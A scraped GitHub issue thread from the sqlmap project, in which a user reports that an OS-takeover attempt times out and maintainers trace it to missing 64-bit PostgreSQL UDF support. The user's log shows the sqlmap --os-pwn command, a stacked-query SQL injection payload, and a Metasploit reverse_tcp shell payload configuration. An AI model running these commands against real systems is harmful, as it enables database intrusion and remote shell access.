-
-
Notifications
You must be signed in to change notification settings - Fork 5.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
sqlmap takeover timeout #2173
Comments
It didn't work. Not sure what's strange here? On Sep 21, 2016 21:20, "Leonardo Esparis" [email protected] wrote:
|
why did not work? |
Are you sure that it is 32-bit environment? Also, please make a quick test Bye On Sep 21, 2016 21:25, "Leonardo Esparis" [email protected] wrote:
|
both computer can communicate with netcat and the problem persist |
|
Can you please check the
|
Please pull the latest revision and retry. There is a possibility that it will work :). Reduced the size(s) of uploaded .so libraries - size constraints regarding file upload size is the standard issue on PostgreSQL SQLi |
mm nope, did not work either D= and im using 64 bits architecture on victim machine.. |
victim machine /tmp folder, 64 bit architecture is supported?
|
Just downloaded one TurnKey 64-bit machine with PostgreSQL and it seems that you are right. I'll need to fix the support for p.s. sqlmap's upload of those |
okay .. =P |
Just a quick update. Situation seems to be more complicated than I thought. As Bernardo originally implemented that part it seems that support for 64-bit version has never been done in the first place. For example |
hi,
when im trying to use metasploit with sqlmap,
a timeout is raised, any suggestion?
$ ./sqlmap -u "http://192.168.2.10/testenv/pgsql/get_brackets.php?id=1" --os-pwn --msf-path /path/to/metasploit
[15:10:54] [INFO] testing connection to the target URL
[15:10:54] [INFO] heuristics detected web page charset 'ascii'
[15:10:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "("
LINE 1: SELECT * FROM users WHERE id=(1(.,),').,') OFFSET 0 LIMIT 1
^'
[15:10:55] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL')
[15:10:55] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "'MYkyOC<'"
LINE 1: SELECT * FROM users WHERE id=(1'MYkyOC<'">bxcrbJ) OFFSET 0 L...
^'
[15:10:55] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks
[15:10:55] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n]
[15:10:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:10:56] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[15:11:07] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[15:11:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:11:07] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[15:11:17] [WARNING] parsed DBMS error message: 'ERROR: syntax error at or near "20"
LINE 1: ...T * FROM users WHERE id=(1);SELECT (CASE WHEN (80 20) THEN (...
^'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 38 HTTP(s) requests:
Parameter: id (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: id=1);SELECT PG_SLEEP(5)--
[15:11:37] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: PostgreSQL
[15:11:37] [INFO] fingerprinting the back-end DBMS operating system
[15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfile" does not exist'
[15:11:37] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions
[15:11:37] [INFO] the back-end DBMS operating system is Linux
[15:11:37] [WARNING] parsed DBMS error message: 'ERROR: table "sqlmapfilehex" does not exist'
[15:11:37] [INFO] testing if current user is DBA
[15:11:42] [INFO] detecting back-end DBMS version from its banner
[15:11:42] [INFO] retrieved: 9.1.23
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
1
[15:13:33] [INFO] checking if UDF 'sys_bineval' already exist
[15:13:33] WARNING time-based comparison requires larger statistical model, please wait.............................. (done)
UDF 'sys_bineval' already exists, do you want to overwrite it? [y/N]
[15:13:46] [INFO] checking if UDF 'sys_exec' already exist
UDF 'sys_exec' already exists, do you want to overwrite it? [y/N]
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => thread
LPORT => 38748
LHOST => 192.168.2.10
[] Started reverse TCP handler on 192.168.2.10:38748
[] Starting the payload handler...
[15:14:37] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[15:19:13] [CRITICAL] timeout occurred while attempting to open a remote session
D=
The text was updated successfully, but these errors were encountered: